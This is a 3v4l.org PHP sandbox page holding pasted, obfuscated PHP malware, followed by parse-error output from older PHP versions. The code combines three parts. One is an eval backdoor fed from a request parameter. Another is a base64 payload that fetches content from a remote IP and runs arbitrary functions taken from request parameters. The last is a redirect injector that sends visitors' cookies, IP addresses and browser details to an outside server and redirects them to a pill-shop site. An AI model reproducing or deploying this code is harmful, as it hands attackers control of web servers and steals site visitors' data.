3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['na1bc75'];if(isset($s22)){eval($s21($s22));}?> <?php //###==### assert("e"."v"."a"."l(b"."a"."s"."e"."6"."4_d"."e"."c"."o"."d"."e('aWYgKCFpc3NldCgkaW5kZ2V0KSkgewpjaG1vZCgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDA0NDQpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkpIGRpZSgkX0NPT0tJRVsiY2xpZW50X2NoZWNrIl0pOwppZiAoIWlzc2V0KCRTRVJWRVJbIkhUVFBfQUNDRVBUX0NIQVJTRVQiXSkpIHsKaWYocHJlZ19tYXRjaCgnIS4hdScsIGZpbGVfZ2V0X2NvbnRlbnRzKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSkpKSAkYyA9ICJVVEYtOCI7IGVsc2UgJGMgPSAid2luZG93cy0xMjUxIjsKfSBlbHNlIHsKJGMgPSAkU0VSVkVSWyJIVFRQX0FDQ0VQVF9DSEFSU0VUIl07Cn0KJGQgPSAkX1NFUlZFUlsiU0VSVkVSX05BTUUiXS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsKJHUgPSAkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiRkb21haW4gPSAiMzEuMjA3LjYuMjE5IjsKJHVybCA9ICIvZ2V0LnBocD9kPSIudXJsZW5jb2RlKCRkKS4iJnU9Ii51cmxlbmNvZGUoJHUpLiImYz0iLiRjLiImaT0xJmg9Ii5tZDUoIjMyNDQxYTI3MTkwZGRhOTVlMDk1YzU0NzZhNDdjZDcyIi4kZC4kdS4kYy4iMSIpOwppZihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSA9PSAxKSB7CiRpbmRnZXQgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cDovLyIuJGRvbWFpbi4kdXJsKTsKZWNobyAkaW5kZ2V0Owp9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKSB7CiRjaCA9IGN1cmxfaW5pdCgiaHR0cDovLyIuJGRvbWFpbi4kdXJsKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgRkFMU0UpOwpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIFRSVUUpOwokcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7CmN1cmxfY2xvc2UoJGNoKTsKJGluZGdldCA9ICRyZXN1bHQ7CmVjaG8gJGluZGdldDsKfSBlbHNlIHsKJGZwID0gZnNvY2tvcGVuKCRkb21haW4sIDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsKaWYgKCRmcCkgewogICAgJG91dCA9ICJHRVQgIi4kdXJsLiIgSFRUUC8xLjFcclxuIjsKICAgICRvdXQgLj0gIkhvc3Q6ICIuJGRvbWFpbi4iXHJcbiI7CiAgICAkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsKICAgIGZ3cml0ZSgkZnAsICRvdXQpOwogICAgJHJlc3AgPSAiIjsKICAgIHdoaWxlICghZmVvZigkZnApKSB7CiAgICAgICAgJHJlc3AgLj0gZmdldHMoJGZwLCAxMjgpOwogICAgfQogICAgZmNsb3NlKCRmcCk7CiAgICBsaXN0KCRoZWFkZXIsICRib2R5KSA9IHByZWdfc3BsaXQoIi9cUlxSLyIsICRyZXNwLCAyKTsKICAgICRpbmRnZXQgPSAkYm9keTsKZWNobyAkaW5kZ2V0Owp9Cn0KJF9SRVFVRVNUWydmJ10oJF9SRVFVRVNUWydjJ10pOwp9'))"); //###==### ?> <?$tds="http://fbt.yahoo.com/counter.php"; $password="fff123106f3430"; $g="http://mypillshop.ru"; $esdid="counter3"; $key="zzzzgb54y45yb45tktbwtberheh6e4wh"; ?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen(' '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$t=$t."&".$key."=".$n;}$t=urlencode($t);if(empty($t)){$t=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$t."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y); while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);} $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>
Output for 4.4.2 - 4.4.9, 5.1.0 - 5.4.36
Parse error: syntax error, unexpected '<' in /in/hWiRj on line 5
Process exited with code 255.
Output for 4.3.0 - 4.3.1, 4.3.5 - 4.4.1, 5.0.0 - 5.0.5
Parse error: parse error, unexpected '<' in /in/hWiRj on line 5
Process exited with code 255.
Output for 4.3.2 - 4.3.4
Parse error: parse error in /in/hWiRj on line 5
Process exited with code 255.